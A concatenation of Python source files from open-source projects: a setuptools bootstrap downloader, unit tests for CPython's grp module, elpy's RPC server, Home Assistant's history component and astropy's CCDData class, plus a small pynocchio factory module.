return _do_download(version, download_base, to_dir,
download_delay)
except pkg_resources.DistributionNotFound:
return _do_download(version, download_base, to_dir,
download_delay)
def _clean_check(cmd, target):
"""
Run the command to download target. If the command fails, clean up before
re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
"""
Download the file at url to target using Powershell (which will validate
trust). Raise an exception if the command cannot complete.
"""
target = os.path.abspath(target)
cmd = [
'powershell',
'-Command',
"(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)" % vars(),
]
_clean_check(cmd, target)
def has_powershell():
if platform.system() != 'Windows':
return False
cmd = ['powershell', '-Command', 'echo test']
devnull = open(os.path.devnull, 'wb')
try:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except:
return False
finally:
devnull.close()
return True
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
cmd = ['curl', url, '--silent', '--output', target]
_clean_check(cmd, target)
def has_curl():
cmd = ['curl', '--version']
devnull = open(os.path.devnull, 'wb')
try:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except:
return False
finally:
devnull.close()
return True
download_file_curl.viable = has_curl
def download_file_wget(url, target):
cmd = ['wget', url, '--quiet', '--output-document', target]
_clean_check(cmd, target)
def has_wget():
cmd = ['wget', '--version']
devnull = open(os.path.devnull, 'wb')
try:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except:
return False
finally:
devnull.close()
return True
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
"""
Use Python to download the file, even though it cannot authenticate the
connection.
"""
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
src = dst = None
try:
src = urlopen(url)
# Read/write all in one block, so we don't create a corrupt file
# if the download is interrupted.
data = src.read()
dst = open(target, "wb")
dst.write(data)
finally:
if src:
src.close()
if dst:
dst.close()
download_file_insecure.viable = lambda: True
def get_best_downloader():
downloaders = [
download_file_powershell,
download_file_curl,
download_file_wget,
download_file_insecure,
]
for dl in downloaders:
if dl.viable():
return dl
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, delay=15,
downloader_factory=get_best_downloader):
"""Download setuptools from a specified location and return its filename
`version` should be a valid setuptools version number that is available
as an egg for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download
attempt.
``downloader_factory`` should be a function taking no arguments and
returning a function for downloading a URL to a target.
"""
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
tgz_name = "setuptools-%s.tar.gz" % version
url = download_base + tgz_name
saveto = os.path.join(to_dir, tgz_name)
if not os.path.exists(saveto): # Avoid repeated downloads
log.warn("Downloading %s", url)
downloader = downloader_factory()
downloader(url, saveto)
return os.path.realpath(saveto)
def _extractall(self, path=".", members=None):
"""Extract all members from the archive to the current working
directory and set owner, modification time and permissions on
directories afterwards. `path' specifies a different directory
to extract to. `members' is optional and must be a subset of the
list returned by getmembers().
"""
import copy
import operator
from tarfile import ExtractError
directories = []
if members is None:
members = self
for tarinfo in members:
if tarinfo.isdir():
# Extract directories with a safe mode.
directories.append(tarinfo)
tarinfo = copy.copy(tarinfo)
tarinfo.mode = 448 # decimal for oct 0700
self.extract(tarinfo, path)
# Reverse sort directories.
if sys.version_info < (2, 4):
def sorter(dir1, dir2):
return cmp(dir1.name, dir2.name)
directories.sort(sorter)
directories.reverse()
else:
directories.sort(key=operator.attrgetter('name'), reverse=True)
# Set correct owner, mtime and filemode on directories.
for tarinfo in directories:
dirpath = os.path.join(path, tarinfo.name)
try:
self.chown(tarinfo, dirpath)
self.utime(tarinfo, dirpath)
self.chmod(tarinfo, dirpath)
except ExtractError:
e = sys.exc_info()[1]
if self.errorlevel > 1:
raise
else:
self._dbg(1, "tarfile: %s" % e)
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the setuptools package
"""
install_args = []
if options.user_install:
if sys.version_info < (2, 6):
log.warn("--user requires Python 2.6 or later")
raise SystemExit(1)
install_args.append('--user')
return install_args
def _parse_args():
"""
Parse the command line for options
"""
parser = optparse.OptionParser()
parser.add_option(
'--user', dest='user_install', action='store_true', default=False,
help='install in user site package (requires Python 2.6 or later)')
parser.add_option(
'--download-base', dest='download_base', metavar="URL",
default=DEFAULT_URL,
help='alternative URL from where to download the setuptools package')
parser.add_option(
'--insecure', dest='downloader_factory', action='store_const',
const=lambda: download_file_insecure, default=get_best_downloader,
help='Use internal, non-validating downloader'
)
options, args = parser.parse_args()
# positional arguments are ignored
return options
def main(version=DEFAULT_VERSION):
"""Install or upgrade setuptools and EasyInstall"""
options = _parse_args()
tarball = download_setuptools(download_base=options.download_base,
downloader_factory=options.downloader_factory)
return _install(tarball, _build_install_args(options))
if __name__ == '__main__':
sys.exit(main())
|
harmy/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/test/test_grp.py | 3 | """Test script for the grp module."""
import unittest
from test import support
grp = support.import_module('grp')
class GroupDatabaseTestCase(unittest.TestCase):
def check_value(self, value):
# check that a grp tuple has the entries and
# attributes promised by the docs
self.assertEqual(len(value), 4)
self.assertEqual(value[0], value.gr_name)
self.assertIsInstance(value.gr_name, str)
self.assertEqual(value[1], value.gr_passwd)
self.assertIsInstance(value.gr_passwd, str)
self.assertEqual(value[2], value.gr_gid)
self.assertIsInstance(value.gr_gid, int)
self.assertEqual(value[3], value.gr_mem)
self.assertIsInstance(value.gr_mem, list)
def test_values(self):
entries = grp.getgrall()
for e in entries:
self.check_value(e)
if len(entries) > 1000: # Huge group file (NIS?) -- skip the rest
return
for e in entries:
e2 = grp.getgrgid(e.gr_gid)
self.check_value(e2)
self.assertEqual(e2.gr_gid, e.gr_gid)
name = e.gr_name
if name.startswith('+') or name.startswith('-'):
# NIS-related entry
continue
e2 = grp.getgrnam(name)
self.check_value(e2)
# There are instances where getgrall() returns group names in
# lowercase while getgrgid() returns proper casing.
# Discovered on Ubuntu 5.04 (custom).
self.assertEqual(e2.gr_name.lower(), name.lower())
def test_errors(self):
self.assertRaises(TypeError, grp.getgrgid)
self.assertRaises(TypeError, grp.getgrnam)
self.assertRaises(TypeError, grp.getgrall, 42)
# try to get some errors
bynames = {}
bygids = {}
for (n, p, g, mem) in grp.getgrall():
if not n or n == '+':
continue # skip NIS entries etc.
bynames[n] = g
bygids[g] = n
allnames = list(bynames.keys())
namei = 0
fakename = allnames[namei]
while fakename in bynames:
chars = list(fakename)
for i in range(len(chars)):
if chars[i] == 'z':
chars[i] = 'A'
break
elif chars[i] == 'Z':
continue
else:
chars[i] = chr(ord(chars[i]) + 1)
break
else:
namei = namei + 1
try:
fakename = allnames[namei]
except IndexError:
# should never happen... if so, just forget it
break
fakename = ''.join(chars)
self.assertRaises(KeyError, grp.getgrnam, fakename)
# Choose a non-existent gid.
fakegid = 4127
while fakegid in bygids:
fakegid = (fakegid * 3) % 0x10000
self.assertRaises(KeyError, grp.getgrgid, fakegid)
def test_main():
support.run_unittest(GroupDatabaseTestCase)
if __name__ == "__main__":
test_main()
|
cpitclaudel/elpy | refs/heads/master | elpy/tests/test_server.py | 3 | # coding: utf-8
"""Tests for the elpy.server module"""
import os
import tempfile
import unittest
import mock
from elpy import rpc
from elpy import server
from elpy.tests import compat
from elpy.tests.support import BackendTestCase
import elpy.refactor
class ServerTestCase(unittest.TestCase):
def setUp(self):
self.srv = server.ElpyRPCServer()
class BackendCallTestCase(ServerTestCase):
def assert_calls_backend(self, method):
with mock.patch("elpy.server.get_source") as get_source:
with mock.patch.object(self.srv, "backend") as backend:
get_source.return_value = "transformed source"
getattr(self.srv, method)("filename", "source", "offset")
get_source.assert_called_with("source")
getattr(backend, method).assert_called_with(
"filename", "transformed source", "offset"
)
class TestInit(ServerTestCase):
def test_should_not_select_a_backend_by_default(self):
self.assertIsNone(self.srv.backend)
class TestRPCEcho(ServerTestCase):
def test_should_return_arguments(self):
self.assertEqual(("hello", "world"),
self.srv.rpc_echo("hello", "world"))
class TestRPCInit(ServerTestCase):
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_set_project_root(self, RopeBackend, JediBackend):
self.srv.rpc_init({"project_root": "/project/root",
"backend": "rope"})
self.assertEqual("/project/root", self.srv.project_root)
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_initialize_rope(self, RopeBackend, JediBackend):
self.srv.rpc_init({"project_root": "/project/root",
"backend": "rope"})
RopeBackend.assert_called_with("/project/root")
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_initialize_jedi(self, RopeBackend, JediBackend):
self.srv.rpc_init({"project_root": "/project/root",
"backend": "jedi"})
JediBackend.assert_called_with("/project/root")
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_use_rope_if_available_and_requested(
self, RopeBackend, JediBackend):
RopeBackend.return_value.name = "rope"
JediBackend.return_value.name = "jedi"
self.srv.rpc_init({"project_root": "/project/root",
"backend": "rope"})
self.assertEqual("rope", self.srv.backend.name)
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_use_jedi_if_available_and_requested(
self, RopeBackend, JediBackend):
RopeBackend.return_value.name = "rope"
JediBackend.return_value.name = "jedi"
self.srv.rpc_init({"project_root": "/project/root",
"backend": "jedi"})
self.assertEqual("jedi", self.srv.backend.name)
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_use_rope_if_available_and_nothing_requested(
self, RopeBackend, JediBackend):
RopeBackend.return_value.name = "rope"
JediBackend.return_value.name = "jedi"
self.srv.rpc_init({"project_root": "/project/root",
"backend": None})
self.assertEqual("rope", self.srv.backend.name)
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_use_jedi_if_rope_not_available_and_nothing_requested(
self, RopeBackend, JediBackend):
RopeBackend.return_value.name = "rope"
JediBackend.return_value.name = "jedi"
old_rope = server.ropebackend
server.ropebackend = None
try:
self.srv.rpc_init({"project_root": "/project/root",
"backend": None})
finally:
server.ropebackend = old_rope
self.assertEqual("jedi", self.srv.backend.name)
@mock.patch("elpy.jedibackend.JediBackend")
@mock.patch("elpy.ropebackend.RopeBackend")
def test_should_use_none_if_nothing_available(
self, RopeBackend, JediBackend):
RopeBackend.return_value.name = "rope"
JediBackend.return_value.name = "jedi"
old_rope = server.ropebackend
old_jedi = server.jedibackend
server.ropebackend = None
server.jedibackend = None
try:
self.srv.rpc_init({"project_root": "/project/root",
"backend": None})
finally:
server.ropebackend = old_rope
server.jedibackend = old_jedi
self.assertIsNone(self.srv.backend)
class TestRPCGetCalltip(BackendCallTestCase):
def test_should_call_backend(self):
self.assert_calls_backend("rpc_get_calltip")
def test_should_handle_no_backend(self):
self.srv.backend = None
self.assertIsNone(self.srv.rpc_get_calltip("filname", "source",
"offset"))
class TestRPCGetCompletions(BackendCallTestCase):
def test_should_call_backend(self):
self.assert_calls_backend("rpc_get_completions")
def test_should_handle_no_backend(self):
self.srv.backend = None
self.assertEqual([],
self.srv.rpc_get_completions("filname", "source",
"offset"))
def test_should_sort_results(self):
with mock.patch.object(self.srv, 'backend') as backend:
backend.rpc_get_completions.return_value = [
{'name': '_e'},
{'name': '__d'},
{'name': 'c'},
{'name': 'B'},
{'name': 'a'},
]
expected = list(reversed(backend.rpc_get_completions.return_value))
actual = self.srv.rpc_get_completions("filename", "source",
"offset")
self.assertEqual(expected, actual)
def test_should_uniquify_results(self):
with mock.patch.object(self.srv, 'backend') as backend:
backend.rpc_get_completions.return_value = [
{'name': 'a'},
{'name': 'a'},
]
expected = [{'name': 'a'}]
actual = self.srv.rpc_get_completions("filename", "source",
"offset")
self.assertEqual(expected, actual)
class TestRPCGetCompletionDocs(ServerTestCase):
def test_should_call_backend(self):
with mock.patch.object(self.srv, "backend") as backend:
self.srv.rpc_get_completion_docstring("completion")
(backend.rpc_get_completion_docstring
.assert_called_with("completion"))
def test_should_handle_no_backend(self):
self.srv.backend = None
self.assertIsNone(self.srv.rpc_get_completion_docstring("foo"))
class TestRPCGetCompletionLocation(ServerTestCase):
def test_should_call_backend(self):
with mock.patch.object(self.srv, "backend") as backend:
self.srv.rpc_get_completion_location("completion")
(backend.rpc_get_completion_location
.assert_called_with("completion"))
def test_should_handle_no_backend(self):
self.srv.backend = None
self.assertIsNone(self.srv.rpc_get_completion_location("foo"))
class TestRPCGetDefinition(BackendCallTestCase):
def test_should_call_backend(self):
self.assert_calls_backend("rpc_get_definition")
def test_should_handle_no_backend(self):
self.srv.backend = None
self.assertIsNone(self.srv.rpc_get_definition("filname", "source",
"offset"))
class TestRPCGetDocstring(BackendCallTestCase):
def test_should_call_backend(self):
self.assert_calls_backend("rpc_get_docstring")
def test_should_handle_no_backend(self):
self.srv.backend = None
self.assertIsNone(self.srv.rpc_get_docstring("filname", "source",
"offset"))
class TestRPCGetPydocCompletions(ServerTestCase):
@mock.patch.object(server, 'get_pydoc_completions')
def test_should_call_pydoc_completions(self, get_pydoc_completions):
srv = server.ElpyRPCServer()
srv.rpc_get_pydoc_completions()
get_pydoc_completions.assert_called_with(None)
srv.rpc_get_pydoc_completions("foo")
get_pydoc_completions.assert_called_with("foo")
class TestGetPydocDocumentation(ServerTestCase):
@mock.patch("pydoc.render_doc")
def test_should_find_documentation(self, render_doc):
render_doc.return_value = "expected"
actual = self.srv.rpc_get_pydoc_documentation("open")
render_doc.assert_called_with("open",
"Elpy Pydoc Documentation for %s",
False)
self.assertEqual("expected", actual)
def test_should_return_none_for_unknown_module(self):
actual = self.srv.rpc_get_pydoc_documentation("frob.open")
self.assertIsNone(actual)
def test_should_return_valid_unicode(self):
import json
docstring = self.srv.rpc_get_pydoc_documentation("tarfile")
json.dumps(docstring)
class TestRPCGetRefactorOptions(BackendTestCase):
@mock.patch.object(compat.builtins, '__import__')
def test_should_fail_if_rope_is_not_available(self, import_):
import_.side_effect = ImportError
filename = self.project_file("foo.py", "")
srv = server.ElpyRPCServer()
self.assertRaises(ImportError, srv.rpc_get_refactor_options,
filename, 0)
@mock.patch.object(elpy.refactor, 'Refactor')
def test_should_initialize_and_call_refactor_object(self, Refactor):
filename = self.project_file("foo.py", "import foo")
srv = server.ElpyRPCServer()
srv.project_root = self.project_root
srv.rpc_get_refactor_options(filename, 5)
Refactor.assert_called_with(self.project_root, filename)
Refactor.return_value.get_refactor_options.assert_called_with(5, None)
class TestRPCRefactor(BackendTestCase):
@mock.patch.object(compat.builtins, '__import__')
def test_should_fail_if_rope_is_not_available(self, import_):
import_.side_effect = ImportError
filename = self.project_file("foo.py", "")
srv = server.ElpyRPCServer()
self.assertRaises(ImportError, srv.rpc_refactor,
filename, 'foo', ())
@mock.patch.object(elpy.refactor, 'Refactor')
def test_should_initialize_and_call_refactor_object_with_args(
self, Refactor):
filename = self.project_file("foo.py", "import foo")
srv = server.ElpyRPCServer()
srv.project_root = self.project_root
srv.rpc_refactor(filename, 'foo', (1, 2, 3))
Refactor.assert_called_with(self.project_root, filename)
Refactor.return_value.get_changes.assert_called_with('foo', 1, 2, 3)
@mock.patch.object(elpy.refactor, 'Refactor')
def test_should_initialize_and_call_refactor_object_without_args(
self, Refactor):
filename = self.project_file("foo.py", "import foo")
srv = server.ElpyRPCServer()
srv.project_root = self.project_root
srv.rpc_refactor(filename, 'foo', None)
Refactor.assert_called_with(self.project_root, filename)
Refactor.return_value.get_changes.assert_called_with('foo')
class TestRPCGetUsages(BackendCallTestCase):
def test_should_call_backend(self):
self.assert_calls_backend("rpc_get_usages")
def test_should_handle_no_backend(self):
self.srv.backend = None
with self.assertRaises(rpc.Fault):
self.assertIsNone(self.srv.rpc_get_usages("filname", "source",
"offset"))
class TestRPCImportMagic(ServerTestCase):
def test_should_call_importmagic(self):
with mock.patch.object(self.srv, "import_magic") as impmagic:
self.srv.rpc_get_import_symbols("filename", "source", "os")
impmagic.get_import_symbols.assert_called_with("os")
self.srv.rpc_add_import("filename", "source", "import os")
impmagic.add_import.assert_called_with("source", "import os")
self.srv.rpc_get_unresolved_symbols("filename", "source")
impmagic.get_unresolved_symbols.assert_called_with("source")
self.srv.rpc_remove_unreferenced_imports("filename", "source")
impmagic.remove_unreferenced_imports.assert_called_with("source")
class TestGetSource(unittest.TestCase):
def test_should_return_string_by_default(self):
self.assertEqual(server.get_source("foo"),
"foo")
def test_should_return_file_contents(self):
fd, filename = tempfile.mkstemp(prefix="elpy-test-")
self.addCleanup(os.remove, filename)
with open(filename, "w") as f:
f.write("file contents")
fileobj = {'filename': filename}
self.assertEqual(server.get_source(fileobj),
"file contents")
def test_should_clean_up_tempfile(self):
fd, filename = tempfile.mkstemp(prefix="elpy-test-")
with open(filename, "w") as f:
f.write("file contents")
fileobj = {'filename': filename,
'delete_after_use': True}
self.assertEqual(server.get_source(fileobj),
"file contents")
self.assertFalse(os.path.exists(filename))
def test_should_support_utf8(self):
fd, filename = tempfile.mkstemp(prefix="elpy-test-")
self.addCleanup(os.remove, filename)
with open(filename, "wb") as f:
f.write(u"möp".encode("utf-8"))
source = server.get_source({'filename': filename})
self.assertEqual(source, u"möp")
class TestPysymbolKey(BackendTestCase):
def keyLess(self, a, b):
self.assertLess(b, a)
self.assertLess(server._pysymbol_key(a),
server._pysymbol_key(b))
def test_should_be_case_insensitive(self):
self.keyLess("bar", "Foo")
def test_should_sort_private_symbols_after_public_symbols(self):
self.keyLess("foo", "_bar")
def test_should_sort_private_symbols_after_dunder_symbols(self):
self.assertLess(server._pysymbol_key("__foo__"),
server._pysymbol_key("_bar"))
def test_should_sort_dunder_symbols_after_public_symbols(self):
self.keyLess("bar", "__foo")
|
ErykB2000/home-assistant | refs/heads/master | tests/test_component_history.py | 4 | """
tests.test_component_history
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests the history component.
"""
# pylint: disable=protected-access,too-many-public-methods
import time
import os
import unittest
import homeassistant as ha
import homeassistant.util.dt as dt_util
from homeassistant.components import history, recorder
from helpers import (
mock_http_component, mock_state_change_event, get_test_home_assistant)
class TestComponentHistory(unittest.TestCase):
""" Tests homeassistant.components.history module. """
def setUp(self): # pylint: disable=invalid-name
""" Init needed objects. """
self.hass = get_test_home_assistant(1)
self.init_rec = False
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
if self.init_rec:
recorder._INSTANCE.block_till_done()
os.remove(self.hass.config.path(recorder.DB_FILE))
def init_recorder(self):
recorder.setup(self.hass, {})
self.hass.start()
recorder._INSTANCE.block_till_done()
self.init_rec = True
def test_setup(self):
""" Test setup method of history. """
mock_http_component(self.hass)
self.assertTrue(history.setup(self.hass, {}))
def test_last_5_states(self):
""" Test retrieving the last 5 states. """
self.init_recorder()
states = []
entity_id = 'test.last_5_states'
for i in range(7):
self.hass.states.set(entity_id, "State {}".format(i))
if i > 1:
states.append(self.hass.states.get(entity_id))
self.hass.pool.block_till_done()
recorder._INSTANCE.block_till_done()
self.assertEqual(
list(reversed(states)), history.last_5_states(entity_id))
def test_get_states(self):
""" Test getting states at a specific point in time. """
self.init_recorder()
states = []
# Create 10 states for 5 different entities
# After the first 5, sleep a second and save the time
# history.get_states takes the latest states BEFORE point X
for i in range(10):
state = ha.State(
'test.point_in_time_{}'.format(i % 5),
"State {}".format(i),
{'attribute_test': i})
mock_state_change_event(self.hass, state)
self.hass.pool.block_till_done()
recorder._INSTANCE.block_till_done()
if i < 5:
states.append(state)
if i == 4:
time.sleep(1)
point = dt_util.utcnow()
self.assertEqual(
states,
sorted(
history.get_states(point), key=lambda state: state.entity_id))
# Test get_state here because we have a DB setup
self.assertEqual(
states[0], history.get_state(point, states[0].entity_id))
def test_state_changes_during_period(self):
self.init_recorder()
entity_id = 'media_player.test'
def set_state(state):
self.hass.states.set(entity_id, state)
self.hass.pool.block_till_done()
recorder._INSTANCE.block_till_done()
return self.hass.states.get(entity_id)
set_state('idle')
set_state('YouTube')
start = dt_util.utcnow()
time.sleep(1)
states = [
set_state('idle'),
set_state('Netflix'),
set_state('Plex'),
set_state('YouTube'),
]
time.sleep(1)
end = dt_util.utcnow()
set_state('Netflix')
set_state('Plex')
self.assertEqual(
{entity_id: states},
history.state_changes_during_period(start, end, entity_id))
|
pynocchio-comic-reader/pynocchio-comic-reader | refs/heads/develop | pynocchio/comic_page_handler_factory.py | 5 | from .comic_page_handler import (ComicPageHandlerDoublePage,
ComicPageHandlerSinglePage)
class ComicPageHandlerFactory():
read_mode = {
False: ComicPageHandlerSinglePage,
True: ComicPageHandlerDoublePage,
}
@staticmethod
def create_handler(page_read_mode, comic, index=0):
return ComicPageHandlerFactory.read_mode[page_read_mode](comic,
index=index)
|
funbaker/astropy | refs/heads/master | astropy/nddata/tests/test_ccddata.py | 2 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# This module implements the base CCDData class.
import textwrap
import numpy as np
import pytest
from ...io import fits
from ..nduncertainty import StdDevUncertainty, MissingDataAssociationException
from ... import units as u
from ... import log
from ...wcs import WCS, FITSFixedWarning
from ...tests.helper import catch_warnings
from ...utils import NumpyRNGContext
from ...utils.data import (get_pkg_data_filename, get_pkg_data_filenames,
get_pkg_data_contents)
from ..ccddata import CCDData
# If additional pytest markers are defined the key in the dictionary below
# should be the name of the marker.
DEFAULTS = {
'seed': 123,
'data_size': 100,
'data_scale': 1.0,
'data_mean': 0.0
}
DEFAULT_SEED = 123
DEFAULT_DATA_SIZE = 100
DEFAULT_DATA_SCALE = 1.0
def value_from_markers(key, request):
try:
val = request.keywords[key].args[0]
except KeyError:
val = DEFAULTS[key]
return val
@pytest.fixture
def ccd_data(request):
"""
Return a CCDData object with units of ADU.
The size of the data array is 100x100 but can be changed using the marker
@pytest.mark.data_size(N) on the test function, where N should be the
desired dimension.
Data values are initialized to random numbers drawn from a normal
distribution with mean of 0 and scale 1.
The scale can be changed with the marker @pytest.marker.scale(s) on the
test function, where s is the desired scale.
The mean can be changed with the marker @pytest.marker.scale(m) on the
test function, where m is the desired mean.
"""
size = value_from_markers('data_size', request)
scale = value_from_markers('data_scale', request)
mean = value_from_markers('data_mean', request)
with NumpyRNGContext(DEFAULTS['seed']):
data = np.random.normal(loc=mean, size=[size, size], scale=scale)
fake_meta = {'my_key': 42, 'your_key': 'not 42'}
ccd = CCDData(data, unit=u.adu)
ccd.header = fake_meta
return ccd
def test_ccddata_empty():
with pytest.raises(TypeError):
CCDData() # empty initializer should fail
def test_ccddata_must_have_unit():
with pytest.raises(ValueError):
CCDData(np.zeros([100, 100]))
def test_ccddata_unit_cannot_be_set_to_none(ccd_data):
with pytest.raises(TypeError):
ccd_data.unit = None
def test_ccddata_meta_header_conflict():
with pytest.raises(ValueError) as exc:
CCDData([1, 2, 3], unit='', meta={1: 1}, header={2: 2})
assert "can't have both header and meta." in str(exc)
@pytest.mark.data_size(10)
def test_ccddata_simple(ccd_data):
assert ccd_data.shape == (10, 10)
assert ccd_data.size == 100
assert ccd_data.dtype == np.dtype(float)
def test_ccddata_init_with_string_electron_unit():
ccd = CCDData(np.zeros((10, 10)), unit="electron")
assert ccd.unit is u.electron
@pytest.mark.data_size(10)
def test_initialize_from_FITS(ccd_data, tmpdir):
hdu = fits.PrimaryHDU(ccd_data)
hdulist = fits.HDUList([hdu])
filename = tmpdir.join('afile.fits').strpath
hdulist.writeto(filename)
cd = CCDData.read(filename, unit=u.electron)
assert cd.shape == (10, 10)
assert cd.size == 100
assert np.issubdtype(cd.data.dtype, np.floating)
for k, v in hdu.header.items():
assert cd.meta[k] == v
def test_initialize_from_fits_with_unit_in_header(tmpdir):
fake_img = np.random.random(size=(100, 100))
hdu = fits.PrimaryHDU(fake_img)
hdu.header['bunit'] = u.adu.to_string()
filename = tmpdir.join('afile.fits').strpath
hdu.writeto(filename)
ccd = CCDData.read(filename)
# ccd should pick up the unit adu from the fits header...did it?
assert ccd.unit is u.adu
# An explicit unit in the read overrides any unit in the FITS file
ccd2 = CCDData.read(filename, unit="photon")
assert ccd2.unit is u.photon
def test_initialize_from_fits_with_ADU_in_header(tmpdir):
fake_img = np.random.random(size=(100, 100))
hdu = fits.PrimaryHDU(fake_img)
hdu.header['bunit'] = 'ADU'
filename = tmpdir.join('afile.fits').strpath
hdu.writeto(filename)
ccd = CCDData.read(filename)
# ccd should pick up the unit adu from the fits header...did it?
assert ccd.unit is u.adu
def test_initialize_from_fits_with_data_in_different_extension(tmpdir):
fake_img = np.random.random(size=(100, 100))
hdu1 = fits.PrimaryHDU()
hdu2 = fits.ImageHDU(fake_img)
hdus = fits.HDUList([hdu1, hdu2])
filename = tmpdir.join('afile.fits').strpath
hdus.writeto(filename)
with catch_warnings(FITSFixedWarning) as w:
ccd = CCDData.read(filename, unit='adu')
assert len(w) == 0
# ccd should pick up the unit adu from the fits header...did it?
np.testing.assert_array_equal(ccd.data, fake_img)
# check that the header is the combined header
assert hdu2.header + hdu1.header == ccd.header
def test_initialize_from_fits_with_extension(tmpdir):
fake_img1 = np.random.random(size=(100, 100))
fake_img2 = np.random.random(size=(100, 100))
hdu0 = fits.PrimaryHDU()
hdu1 = fits.ImageHDU(fake_img1)
hdu2 = fits.ImageHDU(fake_img2)
hdus = fits.HDUList([hdu0, hdu1, hdu2])
filename = tmpdir.join('afile.fits').strpath
hdus.writeto(filename)
ccd = CCDData.read(filename, hdu=2, unit='adu')
# ccd should pick up the unit adu from the fits header...did it?
np.testing.assert_array_equal(ccd.data, fake_img2)
def test_write_unit_to_hdu(ccd_data, tmpdir):
ccd_unit = ccd_data.unit
hdulist = ccd_data.to_hdu()
assert 'bunit' in hdulist[0].header
assert hdulist[0].header['bunit'] == ccd_unit.to_string()
def test_initialize_from_FITS_bad_keyword_raises_error(ccd_data, tmpdir):
# There are two fits.open keywords that are not permitted in ccdproc:
# do_not_scale_image_data and scale_back
filename = tmpdir.join('test.fits').strpath
ccd_data.write(filename)
with pytest.raises(TypeError):
CCDData.read(filename, unit=ccd_data.unit,
do_not_scale_image_data=True)
with pytest.raises(TypeError):
CCDData.read(filename, unit=ccd_data.unit, scale_back=True)
def test_ccddata_writer(ccd_data, tmpdir):
filename = tmpdir.join('test.fits').strpath
ccd_data.write(filename)
ccd_disk = CCDData.read(filename, unit=ccd_data.unit)
np.testing.assert_array_equal(ccd_data.data, ccd_disk.data)
def test_ccddata_meta_is_case_sensitive(ccd_data):
key = 'SoMeKEY'
ccd_data.meta[key] = 10
assert key.lower() not in ccd_data.meta
assert key.upper() not in ccd_data.meta
assert key in ccd_data.meta
def test_ccddata_meta_is_not_fits_header(ccd_data):
ccd_data.meta = {'OBSERVER': 'Edwin Hubble'}
assert not isinstance(ccd_data.meta, fits.Header)
def test_fromMEF(ccd_data, tmpdir):
hdu = fits.PrimaryHDU(ccd_data)
hdu2 = fits.PrimaryHDU(2 * ccd_data.data)
hdulist = fits.HDUList(hdu)
hdulist.append(hdu2)
filename = tmpdir.join('afile.fits').strpath
hdulist.writeto(filename)
# by default, we reading from the first extension
cd = CCDData.read(filename, unit=u.electron)
np.testing.assert_array_equal(cd.data, ccd_data.data)
# but reading from the second should work too
cd = CCDData.read(filename, hdu=1, unit=u.electron)
np.testing.assert_array_equal(cd.data, 2 * ccd_data.data)
def test_metafromheader(ccd_data):
hdr = fits.header.Header()
hdr['observer'] = 'Edwin Hubble'
hdr['exptime'] = '3600'
d1 = CCDData(np.ones((5, 5)), meta=hdr, unit=u.electron)
assert d1.meta['OBSERVER'] == 'Edwin Hubble'
assert d1.header['OBSERVER'] == 'Edwin Hubble'
def test_metafromdict():
dic = {'OBSERVER': 'Edwin Hubble', 'EXPTIME': 3600}
d1 = CCDData(np.ones((5, 5)), meta=dic, unit=u.electron)
assert d1.meta['OBSERVER'] == 'Edwin Hubble'
def test_header2meta():
hdr = fits.header.Header()
hdr['observer'] = 'Edwin Hubble'
hdr['exptime'] = '3600'
d1 = CCDData(np.ones((5, 5)), unit=u.electron)
d1.header = hdr
assert d1.meta['OBSERVER'] == 'Edwin Hubble'
assert d1.header['OBSERVER'] == 'Edwin Hubble'
def test_metafromstring_fail():
hdr = 'this is not a valid header'
with pytest.raises(TypeError):
CCDData(np.ones((5, 5)), meta=hdr, unit=u.adu)
def test_setting_bad_uncertainty_raises_error(ccd_data):
with pytest.raises(TypeError):
# Uncertainty is supposed to be an instance of NDUncertainty
ccd_data.uncertainty = 10
def test_setting_uncertainty_with_array(ccd_data):
ccd_data.uncertainty = None
fake_uncertainty = np.sqrt(np.abs(ccd_data.data))
ccd_data.uncertainty = fake_uncertainty.copy()
np.testing.assert_array_equal(ccd_data.uncertainty.array, fake_uncertainty)
def test_setting_uncertainty_wrong_shape_raises_error(ccd_data):
with pytest.raises(ValueError):
ccd_data.uncertainty = np.random.random(size=(3, 4))
def test_to_hdu(ccd_data):
ccd_data.meta = {'observer': 'Edwin Hubble'}
fits_hdulist = ccd_data.to_hdu()
assert isinstance(fits_hdulist, fits.HDUList)
for k, v in ccd_data.meta.items():
assert fits_hdulist[0].header[k] == v
np.testing.assert_array_equal(fits_hdulist[0].data, ccd_data.data)
def test_copy(ccd_data):
ccd_copy = ccd_data.copy()
np.testing.assert_array_equal(ccd_copy.data, ccd_data.data)
assert ccd_copy.unit == ccd_data.unit
assert ccd_copy.meta == ccd_data.meta
@pytest.mark.parametrize('operation,affects_uncertainty', [
("multiply", True),
("divide", True),
])
@pytest.mark.parametrize('operand', [
2.0,
2 * u.dimensionless_unscaled,
2 * u.photon / u.adu,
])
@pytest.mark.parametrize('with_uncertainty', [
True,
False])
